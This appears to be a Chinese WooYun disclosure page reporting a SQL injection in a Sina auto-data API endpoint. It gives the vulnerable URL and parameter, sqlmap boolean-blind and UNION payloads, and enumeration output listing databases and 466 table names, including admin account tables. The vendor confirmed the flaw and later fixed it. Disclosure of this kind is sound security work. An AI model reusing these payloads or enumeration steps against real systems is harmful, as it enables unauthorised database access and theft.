新浪某站SQL注入漏洞 | wooyun-2016-0187450| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187450

漏洞标题：新浪某站SQL注入漏洞

漏洞作者：心云

提交时间：2016-03-22 09:19

修复时间：2016-05-06 12:10

公开时间：2016-05-06 12:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-22：细节已通知厂商并且等待厂商处理中
2016-03-22：厂商已经确认，细节仅向厂商公开
2016-04-01：细节向核心白帽子及相关领域专家公开
2016-04-11：细节向普通白帽子公开
2016-04-21：细节向实习白帽子公开
2016-05-06：细节向公众公开

简要描述：

求个首页求高rank

详细说明：

注入点：

http://data.auto.sina.com.cn/car/api/car_detail/filter_car.php?callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027&_=1458496287525

注入参数为 subid
丢给sqlmap

Parameter: subid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 AND 2090=2090&_=1458496287525
    Type: UNION query
    Title: MySQL UNION query (17) - 6 columns
    Payload: callback=jQuery1720008847676683217287_1458496287365&oe=utf-8&subid=2027 UNION ALL SELECT 17,17,17,17,17,CONCAT(0x7171717171,0x4c796f
---
[20:17:23] [INFO] testing MySQL
[20:17:23] [INFO] confirming MySQL
[20:17:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[20:17:25] [INFO] fetching database names
[20:17:25] [INFO] the SQL query used returns 3 entries
[20:17:25] [INFO] retrieved: information_schema
[20:17:26] [INFO] retrieved: dataauto
[20:17:26] [INFO] retrieved: test
available databases [3]:
[*] dataauto
[*] information_schema
[*] test

漏洞证明：

当前user ，库：

当前库466个表：

具体表信息：

Database: dataauto
[466 tables]
+-----------------------------+
| Complaints                  |
| admin_accounts              |
| admin_data_auto_log         |
| admin_project               |
| anbangbaoxian               |
| api_log                     |
| assurecar                   |
| auto_brands                 |
| auto_brands_related         |
| auto_car                    |
| auto_car_info               |
| auto_car_info_new           |
| auto_car_new                |
| auto_clicks                 |
| auto_clicks_days            |
| auto_color                  |
| auto_dealer                 |
| auto_groups                 |
| auto_highlights             |
| auto_market                 |
| auto_module_cache           |
| auto_newcar                 |
| auto_news                   |
| auto_o_n_log                |
| auto_sale                   |
| auto_sub_cache              |
| auto_subbrand_top_info      |
| auto_subbrands              |
| auto_subbrands_price        |
| auto_type                   |
| auto_vote                   |
| autoxianxing                |
| beautifycar                 |
| bitauto_adv                 |
| bitauto_carcontrast         |
| bitauto_city                |
| bitauto_news                |
| bitauto_price               |
| bitauto_price_20110130      |
| bitauto_price_bak           |
| bitauto_price_bak_20100917  |
| bitauto_price_g             |
| bitauto_price_tmp           |
| bitauto_province            |
| bitauto_subbrandcontrast    |
| bitauto_vendor              |
| bitauto_vendor_1119         |
| bitauto_vendor_1122         |
| bitauto_vendor_bak_1122     |
| bitauto_vendor_bak_20100917 |
| bitauto_vendor_g            |
| bitauto_vendor_ne           |
| bitauto_vendor_tmp          |
| buycar                      |
| buycar_score                |
| cachekey                    |
| car_hot_rank                |
| car_hot_trend               |
| car_pv                      |
| ce_ping                     |
| comReplay                   |
| compare_log                 |
| compare_log_pic             |
| compare_log_refer           |
| data_match_1                |
| data_match_10               |
| data_match_100              |
| data_match_101              |
| data_match_102              |
| data_match_103              |
| data_match_104              |
| data_match_105              |
| data_match_106              |
| data_match_107              |
| data_match_108              |
| data_match_109              |
| data_match_11               |
| data_match_110              |
| data_match_111              |
| data_match_112              |
| data_match_113              |
| data_match_114              |
| data_match_115              |
| data_match_116              |
| data_match_117              |
| data_match_118              |
| data_match_119              |
| data_match_12               |
| data_match_120              |
| data_match_121              |
| data_match_122              |
| data_match_123              |
| data_match_124              |
| data_match_125              |
| data_match_126              |
| data_match_127              |
| data_match_128              |
| data_match_129              |
| data_match_13               |
| data_match_130              |
| data_match_131              |
| data_match_132              |
| data_match_133              |
| data_match_134              |
| data_match_135              |
| data_match_136              |
| data_match_137              |
| data_match_138              |
| data_match_139              |
| data_match_14               |
| data_match_140              |
| data_match_141              |
| data_match_142              |
| data_match_143              |
| data_match_144              |
| data_match_145              |
| data_match_146              |
| data_match_147              |
| data_match_148              |
| data_match_149              |
| data_match_15               |
| data_match_150              |
| data_match_151              |
| data_match_152              |
| data_match_153              |
| data_match_154              |
| data_match_155              |
| data_match_156              |
| data_match_157              |
| data_match_158              |
| data_match_159              |
| data_match_16               |
| data_match_160              |
| data_match_161              |
| data_match_162              |
| data_match_163              |
| data_match_164              |
| data_match_165              |
| data_match_166              |
| data_match_167              |
| data_match_168              |
| data_match_169              |
| data_match_17               |
| data_match_170              |
| data_match_171              |
| data_match_172              |
| data_match_173              |
| data_match_174              |
| data_match_175              |
| data_match_176              |
| data_match_177              |
| data_match_178              |
| data_match_179              |
| data_match_18               |
| data_match_180              |
| data_match_181              |
| data_match_182              |
| data_match_183              |
| data_match_184              |
| data_match_185              |
| data_match_186              |
| data_match_187              |
| data_match_188              |
| data_match_189              |
| data_match_19               |
| data_match_190              |
| data_match_191              |
| data_match_192              |
| data_match_193              |
| data_match_194              |
| data_match_195              |
| data_match_196              |
| data_match_197              |
| data_match_198              |
| data_match_199              |
| data_match_2                |
| data_match_20               |
| data_match_200              |
| data_match_21               |
| data_match_22               |
| data_match_23               |
| data_match_24               |
| data_match_25               |
| data_match_26               |
| data_match_27               |
| data_match_28               |
| data_match_29               |
| data_match_3                |
| data_match_30               |
| data_match_31               |
| data_match_32               |
| data_match_33               |
| data_match_34               |
| data_match_35               |
| data_match_36               |
| data_match_37               |
| data_match_38               |
| data_match_39               |
| data_match_4                |
| data_match_40               |
| data_match_41               |
| data_match_42               |
| data_match_43               |
| data_match_44               |
| data_match_45               |
| data_match_46               |
| data_match_47               |
| data_match_48               |
| data_match_49               |
| data_match_5                |
| data_match_50               |
| data_match_51               |
| data_match_52               |
| data_match_53               |
| data_match_54               |
| data_match_55               |
| data_match_56               |
| data_match_57               |
| data_match_58               |
| data_match_59               |
| data_match_6                |
| data_match_60               |
| data_match_61               |
| data_match_62               |
| data_match_63               |
| data_match_64               |
| data_match_65               |
| data_match_66               |
| data_match_67               |
| data_match_68               |
| data_match_69               |
| data_match_7                |
| data_match_70               |
| data_match_71               |
| data_match_72               |
| data_match_73               |
| data_match_74               |
| data_match_75               |
| data_match_76               |
| data_match_77               |
| data_match_78               |
| data_match_79               |
| data_match_8                |
| data_match_80               |
| data_match_81               |
| data_match_82               |
| data_match_83               |
| data_match_84               |
| data_match_85               |
| data_match_86               |
| data_match_87               |
| data_match_88               |
| data_match_89               |
| data_match_9                |
| data_match_90               |
| data_match_91               |
| data_match_92               |
| data_match_93               |
| data_match_94               |
| data_match_95               |
| data_match_96               |
| data_match_97               |
| data_match_98               |
| data_match_99               |
| data_match_every_day        |
| data_match_newdata          |
| data_match_newdata_top      |
| dpool_check_db              |
| feedback                    |
| feiyong_guanxi              |
| feiyong_guanxi_quxiao       |
| feiyong_guanxi_xinru        |
| feiyong_xinxi               |
| feiyong_xinxi_total         |
| finecar                     |
| group_buyers                |
| group_car                   |
| group_car_vote              |
| group_car_votedetail        |
| group_city_info             |
| group_seller_info           |
| group_sellers               |
| group_sellers_detail        |
| hot_seo                     |
| hot_seo_new                 |
| iauto_save                  |
| iauto_save_tmp              |
| iauto_trend                 |
| iauto_trend_tmp             |
| iauto_trend_tmp2            |
| index_focus                 |
| iwords                      |
| iwords_new                  |
| iwords_sub                  |
| iwords_test                 |
| jdpower_car                 |
| jdpower_type                |
| koubei                      |
| koubei_click_rank           |
| koubei_comment              |
| koubei_div_log              |
| koubei_grab                 |
| koubei_grab_ts              |
| koubei_impression           |
| koubei_impression_user      |
| koubei_new_0                |
| koubei_new_1                |
| koubei_new_10               |
| koubei_new_11               |
| koubei_new_12               |
| koubei_new_13               |
| koubei_new_14               |
| koubei_new_15               |
| koubei_new_16               |
| koubei_new_17               |
| koubei_new_18               |
| koubei_new_19               |
| koubei_new_2                |
| koubei_new_20               |
| koubei_new_21               |
| koubei_new_22               |
| koubei_new_23               |
| koubei_new_24               |
| koubei_new_25               |
| koubei_new_26               |
| koubei_new_27               |
| koubei_new_28               |
| koubei_new_29               |
| koubei_new_3                |
| koubei_new_30               |
| koubei_new_31               |
| koubei_new_4                |
| koubei_new_5                |
| koubei_new_6                |
| koubei_new_7                |
| koubei_new_8                |
| koubei_new_9                |
| koubei_new_total            |
| koubei_praise               |
| koubei_rank                 |
| koubei_rank_wj              |
| koubei_recommend            |
| koubei_report               |
| koubei_score                |
| koubei_score_avg            |
| koubei_score_new            |
| koubei_score_week_avg       |
| koubei_tag_sorted           |
| koubei_test                 |
| koubei_tt                   |
| koubei_userscores           |
| koubei_view                 |
| koubei_view2                |
| koubei_wap_err              |
| koubei_wb_info              |
| koubei_xw                   |
| koubei_xw1                  |
| listcar                     |
| listcar_total               |
| listperm                    |
| local_price                 |
| local_price_tmp             |
| luntai_brands               |
| luntai_koubei               |
| luntai_subbrands            |
| luntais                     |
| maintain                    |
| maintaincar                 |
| mapproject                  |
| mycar                       |
| new_view_brands             |
| new_view_carlist            |
| new_view_subbrands          |
| news_feedback               |
| news_from_so                |
| news_info                   |
| news_pop                    |
| news_score                  |
| oil_brands                  |
| oil_koubei                  |
| oil_subbrands               |
| oil_use                     |
| oil_use_test                |
| oil_use_v                   |
| oilcar                      |
| oils                        |
| os_gasoline_setting         |
| os_gasoline_type            |
| os_ministry_data            |
| os_netizens_data            |
| os_param                    |
| os_param_base               |
| os_param_list               |
| os_param_type               |
| os_road_conditions          |
| os_score                    |
| os_search_setting           |
| os_searchwd                 |
| os_user_addrecord           |
| os_weight                   |
| permonth_update             |
| photo_api                   |
| publish_key                 |
| refitcar                    |
| searchPic                   |
| shareMan                    |
| shiche                      |
| shicheMan                   |
| shichetubiao                |
| shuyu                       |
| stopcar                     |
| sub_fav                     |
| subbrand_attention          |
| subbrand_koubei_reports     |
| subbrand_month_rank         |
| subbrand_news_forum_comment |
| subnameupdate               |
| temp_bitauto_vendor         |
| test                        |
| umlike                      |
| umnews                      |
| used_car_appraiser          |
| used_car_certification      |
| used_car_dealer             |
| used_car_honor              |
| used_car_info               |
| used_car_linkman            |
| used_car_news               |
| used_car_pic                |
| user_admin                  |
| user_admin_module_map       |
| user_log                    |
| user_modle_tree             |
| user_score                  |
| user_total                  |
| user_type                   |
| vedioMan                    |
| vendor_brand                |
| vendor_brand_bak            |
| vendor_brand_tmp            |
| vin_upload                  |
| washcar                     |
| weibo_log_1106              |
| weibo_log_110622            |
| weibo_log_110623            |
| weibo_log_110624            |
| weibo_log_110625            |
| weibo_log_110626            |
| weibo_log_110627            |
| weibo_log_1107              |
| weibo_log_1108              |
| weibo_log_1109              |
| weibo_log_1110              |
| weibo_log_1111              |
| weibo_log_1112              |
| wom_top_data                |
| xlsj_month                  |
| xlsjk                       |
| xlsjk2                      |
| xlsjk_tmp                   |
| yangche_focuscar            |
| yh_avgconsumptionall        |
| yh_brands                   |
| yh_car                      |
| yh_chexi                    |
| ztmp_bitauto_carcontrast    |
+-----------------------------+

只跑个admin表其他表不跑了反正危害很严重：

修复方案：

1.过滤
2.希望给个高rank 谢谢咯

版权声明：转载请注明来源心云@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2016-03-22 12:10

厂商回复：

感谢关注新浪安全，问题修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187450

漏洞标题：新浪某站SQL注入漏洞

相关厂商：新浪

漏洞作者：心云

提交时间：2016-03-22 09:19

修复时间：2016-05-06 12:10

公开时间：2016-05-06 12:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源心云@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0187450

漏洞标题：新浪某站SQL注入漏洞

相关厂商：新浪

漏洞作者： 心云

提交时间：2016-03-22 09:19

修复时间：2016-05-06 12:10

公开时间：2016-05-06 12:10

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0187450"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 心云@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：心云

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源心云@乌云